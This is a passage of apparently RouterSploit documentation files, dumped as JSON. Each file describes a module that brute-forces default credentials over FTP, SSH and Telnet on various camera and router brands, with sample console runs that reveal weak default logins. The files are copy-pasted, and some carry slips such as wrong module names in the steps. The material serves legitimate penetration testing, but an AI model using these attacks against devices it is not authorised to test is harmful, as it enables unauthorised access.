creds/cameras/siemens/ftp_default_creds\nrsf (Siemens Camera Default FTP Creds) > set target 192.168.1.1\n[+] target => 192.168.1.1\nrsf (Siemens Camera Default FTP Creds) > run\n[*] Running module...\n[*] Target exposes FTP service\n[*] Starting attack against FTP service\n[*] thread-0 thread is starting...\n[-] Authentication Failed - Username: 'admin' Password: '12345'\n[-] Authentication Failed - Username: 'admin' Password: '123456'\n[-] Authentication Failed - Username: 'Admin' Password: '12345'\n[-] Authentication Failed - Username: 'Admin' Password: '123456'\n[+] Authenticated Succeed - Username: 'admin' Password: 'admin'\n[*] thread-0 thread is terminated.\n[*] Elapsed time: 0.06290411949157715 seconds\n[+] Credentials found!\n\n Target Port Service Username Password\n ------ ---- ------- -------- --------\n 192.168.1.1 21 ftp admin admin \n\n```\n" }, { "path": "docs/modules/creds/cameras/siemens/ssh_default_creds.md", "content": "## Description\n\nModule performs dictionary attack with default credentials against Siemens Camera SSH service.\nIf valid credentials are found, they are displayed to the user.\n\n## Verification Steps\n\n 1. Start `./rsf.py`\n 2. Do: `use creds/cameras/siemens/ssh_default_creds`\n 3. Do: `set target [TargetIP]`\n 4. Do: `run`\n 5. If valid credentials are found, they are displayed to the user.\n\n## Scenarios\n\n```\nrsf > use creds/cameras/siemens/ssh_default_creds\nrsf (Siemens Camera Default SSH Creds) > set target 192.168.1.1\n[+] target => 192.168.1.1\nrsf (Siemens Camera Default SSH Creds) > run\n[*] Running module...\n[*] Target exposes SSH service\n[*] Starting default credentials attack against SSH service\n[*] thread-0 thread is starting...\n[-] SSH Authentication Failed - Username: 'admin' Password: '12345'\n[-] SSH Authentication Failed - Username: 'admin' Password: '123456'\n[-] SSH Authentication Failed - Username: 'Admin' Password: '12345'\n[-] SSH Authentication Failed - Username: 'Admin' Password: '123456'\n[+] SSH Authentication Successful - Username: 'admin' Password: 'admin'\n[*] thread-0 thread is terminated.\n[*] Elapsed time: 2.3932292461395264 seconds\n[+] Credentials found!\n\n Target Port Service Username Password\n ------ ---- ------- -------- --------\n 192.168.1.1 22 ssh admin admin \n\n```\n" }, { "path": "docs/modules/creds/cameras/siemens/telnet_default_creds.md", "content": "## Description\n\nModule performs dictionary attack with default credentials against Siemens Camera Telnet service.\nIf valid credentials are found, they are displayed to the user.\n\n## Verification Steps\n\n 1. Start `./rsf.py`\n 2. Do: `use creds/cameras/siemens/telnet_default_creds`\n 3. Do: `set target [TargetIP]`\n 4. Do: `run`\n 5. If valid credentials are found, they are displayed to the user.\n\n## Scenarios\n\n```\nrsf > use creds/cameras/siemens/telnet_default_creds\nrsf (Siemens Camera Default Telnet Creds) > set target 192.168.1.1\n[+] target => 192.168.1.1\nrsf (Siemens Camera Default Telnet Creds) > run\n[*] Running module...\n[*] Target exposes Telnet service\n[*] Starting default credentials attack against Telnet service\n[*] thread-0 thread is starting...\n[-] Telnet Authentication Failed - Username: 'admin' Password: 'admin'\n[-] Telnet Authentication Failed - Username: '1234' Password: '1234'\n[-] Telnet Authentication Failed - Username: 'root' Password: '12345'\n[-] Telnet Authentication Failed - Username: 'root' Password: 'root'\n[+] Telnet Authentication Successful - Username: 'user' Password: 'user'\n[*] thread-0 thread is terminated.\n[*] Elapsed time: 5.389287948608398 seconds\n[+] Credentials found!\n\n Target Port Service Username Password\n ------ ---- ------- -------- --------\n 192.168.1.1 23 telnet user user\n\n```\n" }, { "path": "docs/modules/creds/cameras/speco/ftp_default_creds.md", "content": "## Description\n\nModule performs dictionary attack with default credentials against Speco Camera FTP service.\nIf valid credentials are found, they are displayed to the user.\n\n## Verification Steps\n\n 1. Start `./rsf.py`\n 2. Do: `use creds/cameras/speco/ssh_default_creds`\n 3. Do: `set target [TargetIP]`\n 4. Do: `run`\n 5. If valid credentials are found, they are displayed to the user.\n\n## Scenarios\n\n```\nrsf > use creds/cameras/speco/ftp_default_creds\nrsf (Speco Camera Default FTP Creds) > set target 192.168.1.1\n[+] target => 192.168.1.1\nrsf (Speco Camera Default FTP Creds) > run\n[*] Running module...\n[*] Target exposes FTP service\n[*] Starting attack against FTP service\n[*] thread-0 thread is starting...\n[-] Authentication Failed - Username: 'admin' Password: '12345'\n[-] Authentication Failed - Username: 'admin' Password: '123456'\n[-] Authentication Failed - Username: 'Admin' Password: '12345'\n[-] Authentication Failed - Username: 'Admin' Password: '123456'\n[+] Authenticated Succeed - Username: 'admin' Password: 'admin'\n[*] thread-0 thread is terminated.\n[*] Elapsed time: 0.06290411949157715 seconds\n[+] Credentials found!\n\n Target Port Service Username Password\n ------ ---- ------- -------- --------\n 192.168.1.1 21 ftp admin admin \n\n```\n" }, { "path": "docs/modules/creds/cameras/speco/ssh_default_creds.md", "content": "## Description\n\nModule performs dictionary attack with default credentials against Speco Camera SSH service.\nIf valid credentials are found, they are displayed to the user.\n\n## Verification Steps\n\n 1. Start `./rsf.py`\n 2. Do: `use creds/cameras/speco/ssh_default_creds`\n 3. Do: `set target [TargetIP]`\n 4. Do: `run`\n 5. If valid credentials are found, they are displayed to the user.\n\n## Scenarios\n\n```\nrsf > use creds/cameras/speco/ssh_default_creds\nrsf (Speco Camera Default SSH Creds) > set target 192.168.1.1\n[+] target => 192.168.1.1\nrsf (Speco Camera Default SSH Creds) > run\n[*] Running module...\n[*] Target exposes SSH service\n[*] Starting default credentials attack against SSH service\n[*] thread-0 thread is starting...\n[-] SSH Authentication Failed - Username: 'admin' Password: '12345'\n[-] SSH Authentication Failed - Username: 'admin' Password: '123456'\n[-] SSH Authentication Failed - Username: 'Admin' Password: '12345'\n[-] SSH Authentication Failed - Username: 'Admin' Password: '123456'\n[+] SSH Authentication Successful - Username: 'admin' Password: 'admin'\n[*] thread-0 thread is terminated.\n[*] Elapsed time: 2.3932292461395264 seconds\n[+] Credentials found!\n\n Target Port Service Username Password\n ------ ---- ------- -------- --------\n 192.168.1.1 22 ssh admin admin \n\n```\n" }, { "path": "docs/modules/creds/cameras/speco/telnet_default_creds.md", "content": "## Description\n\nModule performs dictionary attack with default credentials against Speco Camera Telnet service.\nIf valid credentials are found, they are displayed to the user.\n\n## Verification Steps\n\n 1. Start `./rsf.py`\n 2. Do: `use creds/cameras/speco/telnet_default_creds`\n 3. Do: `set target [TargetIP]`\n 4. Do: `run`\n 5. If valid credentials are found, they are displayed to the user.\n\n## Scenarios\n\n```\nrsf > use creds/cameras/speco/telnet_default_creds\nrsf (Speco Camera Default Telnet Creds) > set target 192.168.1.1\n[+] target => 192.168.1.1\nrsf (Speco Camera Default Telnet Creds) > run\n[*] Running module...\n[*] Target exposes Telnet service\n[*] Starting default credentials attack against Telnet service\n[*] thread-0 thread is starting...\n[-] Telnet Authentication Failed - Username: 'admin' Password: 'admin'\n[-] Telnet Authentication Failed - Username: '1234' Password: '1234'\n[-] Telnet Authentication Failed - Username: 'root' Password: '12345'\n[-] Telnet Authentication Failed - Username: 'root' Password: 'root'\n[+] Telnet Authentication Successful - Username: 'user' Password: 'user'\n[*] thread-0 thread is terminated.\n[*] Elapsed time: 5.389287948608398 seconds\n[+] Credentials found!\n\n Target Port Service Username Password\n ------ ---- ------- -------- --------\n 192.168.1.1 23 telnet user user\n\n```\n" }, { "path": "docs/modules/creds/cameras/stardot/ftp_default_creds.md", "content": "## Description\n\nModule performs dictionary attack with default credentials against Stardot Camera FTP service.\nIf valid credentials are found, they are displayed to the user.\n\n## Verification Steps\n\n 1. Start `./rsf.py`\n 2. Do: `use creds/cameras/stardot/ssh_default_creds`\n 3. Do: `set target [TargetIP]`\n 4. Do: `run`\n 5. If valid credentials are found, they are displayed to the user.\n\n## Scenarios\n\n```\nrsf > use creds/cameras/stardot/ftp_default_creds\nrsf (Stardot Camera Default FTP Creds) > set target 192.168.1.1\n[+] target => 192.168.1.1\nrsf (Stardot Camera Default FTP Creds) > run\n[*] Running module...\n[*] Target exposes FTP service\n[*] Starting attack against FTP service\n[*] thread-0 thread is starting...\n[-] Authentication Failed - Username: 'admin' Password: '12345'\n[-] Authentication Failed - Username: 'admin' Password: '123456'\n[-] Authentication Failed - Username: 'Admin' Password: '12345'\n[-] Authentication Failed - Username: 'Admin' Password: '123456'\n[+] Authenticated Succeed - Username: 'admin' Password: 'admin'\n[*] thread-0 thread is terminated.\n[*] Elapsed time: 0.06290411949157715 seconds\n[+] Credentials found!\n\n Target Port Service Username Password\n ------ ---- ------- -------- --------\n 192.168.1.1 21 ftp admin admin \n\n```\n" }, { "path": "docs/modules/creds/cameras/stardot/ssh_default_creds.md", "content": "## Description\n\nModule performs dictionary attack with default credentials against Stardot Camera SSH service.\nIf valid credentials are found, they are displayed to the user.\n\n## Verification Steps\n\n 1. Start `./rsf.py`\n 2. Do: `use creds/cameras/stardot/ssh_default_creds`\n 3. Do: `set target [TargetIP]`\n 4. Do: `run`\n 5. If valid credentials are found, they are displayed to the user.\n\n## Scenarios\n\n```\nrsf > use creds/cameras/stardot/ssh_default_creds\nrsf (Stardot Camera Default SSH Creds) > set target 192.168.1.1\n[+] target => 192.168.1.1\nrsf (Stardot Camera Default SSH Creds) > run\n[*] Running module...\n[*] Target exposes SSH service\n[*] Starting default credentials attack against SSH service\n[*] thread-0 thread is starting...\n[-] SSH Authentication Failed - Username: 'admin' Password: '12345'\n[-] SSH Authentication Failed - Username: 'admin' Password: '123456'\n[-] SSH Authentication Failed - Username: 'Admin' Password: '12345'\n[-] SSH Authentication Failed - Username: 'Admin' Password: '123456'\n[+] SSH Authentication Successful - Username: 'admin' Password: 'admin'\n[*] thread-0 thread is terminated.\n[*] Elapsed time: 2.3932292461395264 seconds\n[+] Credentials found!\n\n Target Port Service Username Password\n ------ ---- ------- -------- --------\n 192.168.1.1 22 ssh admin admin \n\n```\n" }, { "path": "docs/modules/creds/cameras/stardot/telnet_default_creds.md", "content": "## Description\n\nModule performs dictionary attack with default credentials against Stardot Camera Telnet service.\nIf valid credentials are found, they are displayed to the user.\n\n## Verification Steps\n\n 1. Start `./rsf.py`\n 2. Do: `use creds/cameras/stardot/telnet_default_creds`\n 3. Do: `set target [TargetIP]`\n 4. Do: `run`\n 5. If valid credentials are found, they are displayed to the user.\n\n## Scenarios\n\n```\nrsf > use creds/cameras/stardot/telnet_default_creds\nrsf (Stardot Camera Default Telnet Creds) > set target 192.168.1.1\n[+] target => 192.168.1.1\nrsf (Stardot Camera Default Telnet Creds) > run\n[*] Running module...\n[*] Target exposes Telnet service\n[*] Starting default credentials attack against Telnet service\n[*] thread-0 thread is starting...\n[-] Telnet Authentication Failed - Username: 'admin' Password: 'admin'\n[-] Telnet Authentication Failed - Username: '1234' Password: '1234'\n[-] Telnet Authentication Failed - Username: 'root' Password: '12345'\n[-] Telnet Authentication Failed - Username: 'root' Password: 'root'\n[+] Telnet Authentication Successful - Username: 'user' Password: 'user'\n[*] thread-0 thread is terminated.\n[*] Elapsed time: 5.389287948608398 seconds\n[+] Credentials found!\n\n Target Port Service Username Password\n ------ ---- ------- -------- --------\n 192.168.1.1 23 telnet user user\n\n```\n" }, { "path": "docs/modules/creds/cameras/vacron/ftp_default_creds.md", "content": "## Description\n\nModule performs dictionary attack with default credentials against Vacron Camera FTP service.\nIf valid credentials are found, they are displayed to the user.\n\n## Verification Steps\n\n 1. Start `./rsf.py`\n 2. Do: `use creds/cameras/vacron/ssh_default_creds`\n 3. Do: `set target [TargetIP]`\n 4. Do: `run`\n 5. If valid credentials are found, they are displayed to the user.\n\n## Scenarios\n\n```\nrsf > use creds/cameras/vacron/ftp_default_creds\nrsf (Vacron Camera Default FTP Creds) > set target 192.168.1.1\n[+] target => 192.168.1.1\nrsf (Vacron Camera Default FTP Creds) > run\n[*] Running module...\n[*] Target exposes FTP service\n[*] Starting attack against FTP service\n[*] thread-0 thread is starting...\n[-] Authentication Failed - Username: 'admin' Password: '12345'\n[-] Authentication Failed - Username: 'admin' Password: '123456'\n[-] Authentication Failed - Username: 'Admin' Password: '12345'\n[-] Authentication Failed - Username: 'Admin' Password: '123456'\n[+] Authenticated Succeed - Username: 'admin' Password: 'admin'\n[*] thread-0 thread is terminated.\n[*] Elapsed time: 0.06290411949157715 seconds\n[+] Credentials found!\n\n Target Port Service Username Password\n ------ ---- ------- -------- --------\n 192.168.1.1 21 ftp admin admin \n\n```\n" }, { "path": "docs/modules/creds/cameras/vacron/ssh_default_creds.md", "content": "## Description\n\nModule performs dictionary attack with default credentials against Vacron Camera SSH service.\nIf valid credentials are found, they are displayed to the user.\n\n## Verification Steps\n\n 1. Start `./rsf.py`\n 2. Do: `use creds/cameras/vacron/ssh_default_creds`\n 3. Do: `set target [TargetIP]`\n 4. Do: `run`\n 5. If valid credentials are found, they are displayed to the user.\n\n## Scenarios\n\n```\nrsf > use creds/cameras/vacron/ssh_default_creds\nrsf (Vacron Camera Default SSH Creds) > set target 192.168.1.1\n[+] target => 192.168.1.1\nrsf (Vacron Camera Default SSH Creds) > run\n[*] Running module...\n[*] Target exposes SSH service\n[*] Starting default credentials attack against SSH service\n[*] thread-0 thread is starting...\n[-] SSH Authentication Failed - Username: 'admin' Password: '12345'\n[-] SSH Authentication Failed - Username: 'admin' Password: '123456'\n[-] SSH Authentication Failed - Username: 'Admin' Password: '12345'\n[-] SSH Authentication Failed - Username: 'Admin' Password: '123456'\n[+] SSH Authentication Successful - Username: 'admin' Password: 'admin'\n[*] thread-0 thread is terminated.\n[*] Elapsed time: 2.3932292461395264 seconds\n[+] Credentials found!\n\n Target Port Service Username Password\n ------ ---- ------- -------- --------\n 192.168.1.1 22 ssh admin admin \n\n```\n" }, { "path": "docs/modules/creds/cameras/vacron/telnet_default_creds.md", "content": "## Description\n\nModule performs dictionary attack with default credentials against Vacron Camera Telnet service.\nIf valid credentials are found, they are displayed to the user.\n\n## Verification Steps\n\n 1. Start `./rsf.py`\n 2. Do: `use creds/cameras/vacron/telnet_default_creds`\n 3. Do: `set target [TargetIP]`\n 4. Do: `run`\n 5. If valid credentials are found, they are displayed to the user.\n\n## Scenarios\n\n```\nrsf > use creds/cameras/vacron/telnet_default_creds\nrsf (Vacron Camera Default Telnet Creds) > set target 192.168.1.1\n[+] target => 192.168.1.1\nrsf (Vacron Camera Default Telnet Creds) > run\n[*] Running module...\n[*] Target exposes Telnet service\n[*] Starting default credentials attack against Telnet service\n[*] thread-0 thread is starting...\n[-] Telnet Authentication Failed - Username: 'admin' Password: 'admin'\n[-] Telnet Authentication Failed - Username: '1234' Password: '1234'\n[-] Telnet Authentication Failed - Username: 'root' Password: '12345'\n[-] Telnet Authentication Failed - Username: 'root' Password: 'root'\n[+] Telnet Authentication Successful - Username: 'user' Password: 'user'\n[*] thread-0 thread is terminated.\n[*] Elapsed time: 5.389287948608398 seconds\n[+] Credentials found!\n\n Target Port Service Username Password\n ------ ---- ------- -------- --------\n 192.168.1.1 23 telnet user user\n\n```\n" }, { "path": "docs/modules/creds/cameras/videoiq/ftp_default_creds.md", "content": "## Description\n\nModule performs dictionary attack with default credentials against VideoIQ Camera FTP service.\nIf valid credentials are found, they are displayed to the user.\n\n## Verification Steps\n\n 1. Start `./rsf.py`\n 2. Do: `use creds/cameras/videoiq/ssh_default_creds`\n 3. Do: `set target [TargetIP]`\n 4. Do: `run`\n 5. If valid credentials are found, they are displayed to the user.\n\n## Scenarios\n\n```\nrsf > use creds/cameras/videoiq/ftp_default_creds\nrsf (VideoIQ Camera Default FTP Creds) > set target 192.168.1.1\n[+] target => 192.168.1.1\nrsf (VideoIQ Camera Default FTP Creds) > run\n[*] Running module...\n[*] Target exposes FTP service\n[*] Starting attack against FTP service\n[*] thread-0 thread is starting...\n[-] Authentication Failed - Username: 'admin' Password: '12345'\n[-] Authentication Failed - Username: 'admin' Password: '123456'\n[-] Authentication Failed - Username: 'Admin' Password: '12345'\n[-] Authentication Failed - Username: 'Admin' Password: '123456'\n[+] Authenticated Succeed - Username: 'admin' Password: 'admin'\n[*] thread-0 thread is terminated.\n[*] Elapsed time: 0.06290411949157715 seconds\n[+] Credentials found!\n\n Target Port Service Username Password\n ------ ---- ------- -------- --------\n 192.168.1.1 21 ftp admin admin \n\n```\n" }, { "path": "docs/modules/creds/cameras/videoiq/ssh_default_creds.md", "content": "## Description\n\nModule performs dictionary attack with default credentials against VideoIQ Camera SSH service.\nIf valid credentials are found, they are displayed to the user.\n\n## Verification Steps\n\n 1. Start `./rsf.py`\n 2. Do: `use creds/cameras/videoiq/ssh_default_creds`\n 3. Do: `set target [TargetIP]`\n 4. Do: `run`\n 5. If valid credentials are found, they are displayed to the user.\n\n## Scenarios\n\n```\nrsf > use creds/cameras/videoiq/ssh_default_creds\nrsf (VideoIQ Camera Default SSH Creds) > set target 192.168.1.1\n[+] target => 192.168.1.1\nrsf (VideoIQ Camera Default SSH Creds) > run\n[*] Running module...\n[*] Target exposes SSH service\n[*] Starting default credentials attack against SSH service\n[*] thread-0 thread is starting...\n[-] SSH Authentication Failed - Username: 'admin' Password: '12345'\n[-] SSH Authentication Failed - Username: 'admin' Password: '123456'\n[-] SSH Authentication Failed - Username: 'Admin' Password: '12345'\n[-] SSH Authentication Failed - Username: 'Admin' Password: '123456'\n[+] SSH Authentication Successful - Username: 'admin' Password: 'admin'\n[*] thread-0 thread is terminated.\n[*] Elapsed time: 2.3932292461395264 seconds\n[+] Credentials found!\n\n Target Port Service Username Password\n ------ ---- ------- -------- --------\n 192.168.1.1 22 ssh admin admin \n\n```\n" }, { "path": "docs/modules/creds/cameras/videoiq/telnet_default_creds.md", "content": "## Description\n\nModule performs dictionary attack with default credentials against VideoIQ Camera Telnet service.\nIf valid credentials are found, they are displayed to the user.\n\n## Verification Steps\n\n 1. Start `./rsf.py`\n 2. Do: `use creds/cameras/videoiq/telnet_default_creds`\n 3. Do: `set target [TargetIP]`\n 4. Do: `run`\n 5. If valid credentials are found, they are displayed to the user.\n\n## Scenarios\n\n```\nrsf > use creds/cameras/videoiq/telnet_default_creds\nrsf (VideoIQ Camera Default Telnet Creds) > set target 192.168.1.1\n[+] target => 192.168.1.1\nrsf (VideoIQ Camera Default Telnet Creds) > run\n[*] Running module...\n[*] Target exposes Telnet service\n[*] Starting default credentials attack against Telnet service\n[*] thread-0 thread is starting...\n[-] Telnet Authentication Failed - Username: 'admin' Password: 'admin'\n[-] Telnet Authentication Failed - Username: '1234' Password: '1234'\n[-] Telnet Authentication Failed - Username: 'root' Password: '12345'\n[-] Telnet Authentication Failed - Username: 'root' Password: 'root'\n[+] Telnet Authentication Successful - Username: 'user' Password: 'user'\n[*] thread-0 thread is terminated.\n[*] Elapsed time: 5.389287948608398 seconds\n[+] Credentials found!\n\n Target Port Service Username Password\n ------ ---- ------- -------- --------\n 192.168.1.1 23 telnet user user\n\n```\n" }, { "path": "docs/modules/creds/routers/asmax/ftp_default_creds.md", "content": "## Description\n\nModule performs dictionary attack with default credentials against Asmax Router FTP service.\nIf valid credentials are found, they are displayed to the user.\n\n## Verification Steps\n\n 1. Start `./rsf.py`\n 2. Do: `use creds/routers/asmax/ftp_default_creds`\n 3. Do: `set target [TargetIP]`\n 4. Do: `run`\n 5. If valid credentials are found, they are displayed to the user.\n\n## Scenarios\n\n```\nrsf > use creds/routers/asmax/ftp_default_creds\nrsf (Asmax Router Default FTP Creds) > set target 192.168.1.1\n[+] target => 192.168.1.1\nrsf (Asmax Router Default FTP Creds) > run\n[*] Running module...\n[*] Target exposes FTP service\n[*] Starting attack against FTP service\n[*] thread-0 thread is starting...\n[-] Authentication Failed - Username: 'admin' Password: '12345'\n[-] Authentication Failed - Username: 'admin' Password: '123456'\n[-] Authentication Failed - Username: 'Admin' Password: '12345'\n[-] Authentication Failed - Username: 'Admin' Password: '123456'\n[+] Authenticated Succeed - Username: 'admin' Password: 'admin'\n[*] thread-0 thread is terminated.\n[*] Elapsed time: 0.06290411949157715 seconds\n[+] Credentials found!\n\n Target Port Service Username Password\n ------ ---- ------- -------- --------\n 192.168.1.1 21 ftp admin admin \n\n```\n" }, { "path": "docs/modules/creds/routers/asmax/ssh_default_creds.md", "content": "## Description\n\nModule performs dictionary attack with default credentials against Asmax Camera SSH service.\nIf valid credentials are found, they are displayed to the user.\n\n## Verification Steps\n\n 1. Start `./rsf.py`\n 2. Do: `use creds/routers/asmax/ssh_default_creds`\n 3. Do: `set target [TargetIP]`\n 4. Do: `run`\n 5. If valid credentials are found, they are displayed to the user.\n\n## Scenarios\n\n```\nrsf > use creds/routers/asmax/ssh_default_creds\nrsf (Asmax Router Default SSH Creds) > set target 192.168.1.1\n[+] target => 192.168.1.1\nrsf (Asmax Router Default SSH Creds) > run\n[*] Running module...\n[*] Target exposes SSH service\n[*] Starting default credentials attack against SSH service\n[*] thread-0 thread is starting...\n[-] SSH Authentication Failed - Username: 'admin' Password: '12345'\n[-] SSH Authentication Failed - Username: 'admin' Password: '123456'\n[-] SSH Authentication Failed - Username: 'Admin' Password: '12345'\n[-] SSH Authentication Failed - Username: 'Admin' Password: '123456'\n[+] SSH Authentication Successful - Username: 'admin' Password: 'admin'\n[*] thread-0 thread is terminated.\n[*] Elapsed time: 2.3932292461395264 seconds\n[+] Credentials found!\n\n Target Port Service Username Password\n ------ ---- ------- -------- --------\n 192.168.1.1 22 ssh admin admin \n\n```\n" }, { "path": "docs/modules/creds/routers/asmax/telnet_default_creds.md", "content": "## Description\n\nModule performs dictionary attack with default credentials against Asmax Router Telnet service.\nIf valid credentials are found, they are displayed to the user.\n\n## Verification Steps\n\n 1. Start `./rsf.py`\n 2. Do: `use creds/routers/asmax/telnet_default_creds`\n 3. Do: `set target [TargetIP]`\n 4. Do: `run`\n 5. If valid credentials are found, they are displayed to the user.\n\n## Scenarios\n\n```\nrsf > use creds/routers/asmax/telnet_default_creds\nrsf (Asmax Router Default Telnet Creds) > set target 192.168.1.1\n[+] target => 192.168.1.1\nrsf (Asmax Router Default Telnet Creds) > run\n[*] Running module...\n[*] Target exposes Telnet service\n[*] Starting default credentials attack against Telnet service\n[*] thread-0 thread is starting...\n[-] Telnet Authentication Failed - Username: 'admin' Password: 'admin'\n[-] Telnet Authentication Failed - Username: '1234' Password: '1234'\n[-] Telnet Authentication Failed - Username: 'root' Password: '12345'\n[-] Telnet Authentication Failed - Username: 'root' Password: 'root'\n[+] Telnet Authentication Successful - Username: 'user' Password: 'user'\n[*] thread-0 thread is terminated.\n[*] Elapsed time: 5.389287948608398 seconds\n[+] Credentials found!\n\n Target Port Service Username Password\n ------ ---- ------- -------- --------\n 192.168.1.1 23 telnet user user\n\n```\n" }, { "path": "docs/modules/creds/routers/asus/ftp_default_creds.md", "content": "## Description\n\nModule performs dictionary attack with default credentials against Asus Router FTP service.\nIf valid credentials are found, they are displayed to the user.\n\n## Verification Steps\n\n 1. Start `./rsf.py`\n 2. Do: `use creds/routers/asus/ftp_default_creds`\n 3. Do: `set target [TargetIP]`\n 4. Do: `run`\n 5. If valid credentials are found, they are displayed to the user.\n\n## Scenarios\n\n```\nrsf > use creds/routers/asus/ftp_default_creds\nrsf (Asus Router Default FTP Creds) > set target 192.168.1.1\n[+] target => 192.168.1.1\nrsf (Asus Router Default FTP Creds) > run\n[*] Running module...\n[*] Target exposes FTP service\n[*] Starting attack against FTP service\n[*] thread-0 thread is starting...\n[-] Authentication Failed - Username: 'admin' Password: '12345'\n[-] Authentication Failed - Username: 'admin' Password: '123456'\n[-] Authentication Failed - Username: 'Admin' Password: '12345'\n[-] Authentication Failed - Username: 'Admin' Password: '123456'\n[+] Authenticated Succeed - Username: 'admin' Password: 'admin'\n[*] thread-0 thread is terminated.\n[*] Elapsed time: 0.06290411949157715 seconds\n[+] Credentials found!\n\n Target Port Service Username Password\n ------ ---- ------- -------- --------\n 192.168.1.1 21 ftp admin admin \n\n```\n" }, { "path": "docs/modules/creds/routers/asus/ssh_default_creds.md", "content": "## Description\n\nModule performs dictionary attack with default credentials against Asus Router SSH service.\nIf valid credentials are found, they are displayed to the user.\n\n## Verification Steps\n\n 1. Start `./rsf.py`\n 2. Do: `use creds/routers/asus/ssh_default_creds`\n 3. Do: `set target [TargetIP]`\n 4. Do: `run`\n 5. If valid credentials are found, they are displayed to the user.\n\n## Scenarios\n\n```\nrsf > use creds/routers/asus/ssh_default_creds\nrsf (Asus Router Default SSH Creds) > set target 192.168.1.1\n[+] target => 192.168.1.1\nrsf (Asus Router Default SSH Creds) > run\n[*] Running module...\n[*] Target exposes SSH service\n[*] Starting default credentials attack against SSH service\n[*] thread-0 thread is starting...\n[-] SSH Authentication Failed - Username: 'admin' Password: '12345'\n[-] SSH Authentication Failed - Username: 'admin' Password: '123456'\n[-] SSH Authentication Failed - Username: 'Admin' Password: '12345'\n[-] SSH Authentication Failed - Username: 'Admin' Password: '123456'\n[+] SSH Authentication Successful - Username: 'admin' Password: 'admin'\n[*] thread-0 thread is terminated.\n[*] Elapsed time: 2.3932292461395264 seconds\n[+] Credentials found!\n\n Target Port Service Username Password\n ------ ---- ------- -------- --------\n 192.168.1.1 22 ssh admin admin \n\n```\n" }, { "path": "docs/modules/creds/routers/asus/telnet_default_creds.md", "content": "## Description\n\nModule performs dictionary attack with default credentials against Asus Router Telnet service.\nIf valid credentials are found, they are displayed to the user.\n\n## Verification Steps\n\n 1. Start `./rsf.py`\n 2. Do: `use creds/routers/asus/telnet_default_creds`\n 3. Do: `set target [TargetIP]`\n 4. Do: `run`\n 5. If valid credentials are found, they are displayed to the user.\n\n## Scenarios\n\n```\nrsf > use creds/routers/asus/telnet_default_creds\nrsf (Asus Router Default Telnet Creds) > set target 192.168.1.1\n[+] target => 192.168.1.1\nrsf (Asus Router Default Telnet Creds) > run\n[*] Running module...\n[*] Target exposes Telnet service\n[*] Starting default credentials attack against Telnet service\n[*] thread-0 thread is starting...\n[-] Telnet Authentication Failed - Username: 'admin' Password: 'admin'\n[-] Telnet Authentication Failed - Username: '1234' Password: '1234'\n[-] Telnet Authentication Failed - Username: 'root' Password: '12345'\n[-] Telnet Authentication Failed - Username: 'root' Password: 'root'\n[+] Telnet Authentication Successful - Username: 'user' Password: 'user'\n[*] thread-0 thread is terminated.\n[*] Elapsed time: 5.389287948608398 seconds\n[+] Credentials found!\n\n Target Port Service Username Password\n ------ ---- ------- -------- --------\n 192.168.1.1 23 telnet user user\n\n```\n" }, { "path": "docs/modules/creds/routers/belkin/ftp_default_creds.md", "content": "## Description\n\nModule performs dictionary attack with default credentials against Belkin Router FTP service.\nIf valid credentials are found, they are displayed to the user.\n\n## Verification Steps\n\n 1. Start `./rsf.py`\n 2. Do: `use creds/routers/belkin/ftp_default_creds`\n 3. Do: `set target [TargetIP]`\n 4. Do: `run`\n 5. If valid credentials are found, they are displayed to the user.\n\n## Scenarios\n\n```\nrsf > use creds/routers/belkin/ftp_default_creds\nrsf (Belkin Router Default FTP Creds) > set target 192.168.1.1\n[+] target => 192.168.1.1\nrsf (Belkin Router Default FTP Creds) > run\n[*] Running module...\n[*] Target exposes FTP service\n[*] Starting attack against FTP service\n[*] thread-0 thread is starting...\n[-] Authentication Failed - Username: 'admin' Password: '12345'\n[-] Authentication Failed - Username: 'admin' Password: '123456'\n[-] Authentication Failed - Username: 'Admin' Password: '12345'\n[-] Authentication Failed - Username: 'Admin' Password: '123456'\n[+] Authenticated Succeed - Username: 'admin' Password: 'admin'\n[*] thread-0 thread is terminated.\n[*] Elapsed time: 0.06290411949157715 seconds\n[+] Credentials found!\n\n Target Port Service Username Password\n ------ ---- ------- -------- --------\n 192.168.1.1 21 ftp admin admin \n\n```\n" }, { "path": "docs/modules/creds/routers/belkin/ssh_default_creds.md", "content": "## Description\n\nModule performs dictionary attack with default credentials against Belkin Router SSH service.\nIf valid credentials are found, they are displayed to the user.\n\n## Verification Steps\n\n 1. Start `./rsf.py`\n 2. Do: `use creds/routers/belkin/ssh_default_creds`\n 3. Do: `set target [TargetIP]`\n 4. Do: `run`\n 5. If valid credentials are found, they are displayed to the user.\n\n## Scenarios\n\n```\nrsf > use creds/routers/belkin/ssh_default_creds\nrsf (Belkin Router Default SSH Creds) > set target 192.168.1.1\n[+] target => 192.168.1.1\nrsf (Belkin Router Default SSH Creds) > run\n[*] Running module...\n[*] Target exposes SSH service\n[*] Starting default credentials attack against SSH service\n[*] thread-0 thread is starting...\n[-] SSH Authentication Failed - Username: 'admin' Password: '12345'\n[-] SSH Authentication Failed - Username: 'admin' Password: '123456'\n[-] SSH Authentication Failed - Username: 'Admin' Password: '12345'\n[-] SSH Authentication Failed - Username: 'Admin' Password: '123456'\n[+] SSH Authentication Successful - Username: 'admin' Password: 'admin'\n[*] thread-0 thread is terminated.\n[*] Elapsed time: 2.3932292461395264 seconds\n[+] Credentials found!\n\n Target Port Service Username Password\n ------ ---- ------- -------- --------\n 192.168.1.1 22 ssh admin admin \n\n```\n" }, { "path": "docs/modules/creds/routers/belkin/telnet_default_creds.md", "content": "## Description\n\nModule performs dictionary attack with default credentials against Belkin Router Telnet service.\nIf valid credentials are found, they are displayed to the user.\n\n## Verification Steps\n\n 1. Start `./rsf.py`\n 2. Do: `use creds/routers/belkin/telnet_default_creds`\n 3. Do: `set target [TargetIP]`\n 4. Do: `run`\n 5. If valid credentials are found, they are displayed to the user.\n\n## Scenarios\n\n```\nrsf > use creds/routers/belkin/telnet_default_creds\nrsf (Belkin Router Default Telnet Creds) > set target 192.168.1.1\n[+] target => 192.168.1.1\nrsf (Belkin Router Default Telnet Creds) > run\n[*] Running module...\n[*] Target exposes Telnet service\n[*] Starting default credentials attack against Telnet service\n[*] thread-0 thread is starting...\n[-] Telnet Authentication Failed - Username: 'admin' Password: 'admin'\n[-] Telnet Authentication Failed - Username: '1234' Password: '1234'\n[-] Telnet Authentication Failed - Username: 'root' Password: '12345'\n[-] Telnet Authentication Failed - Username: 'root' Password: 'root'\n[+] Telnet Authentication Successful - Username: 'user' Password: 'user'\n[*] thread-0 thread is 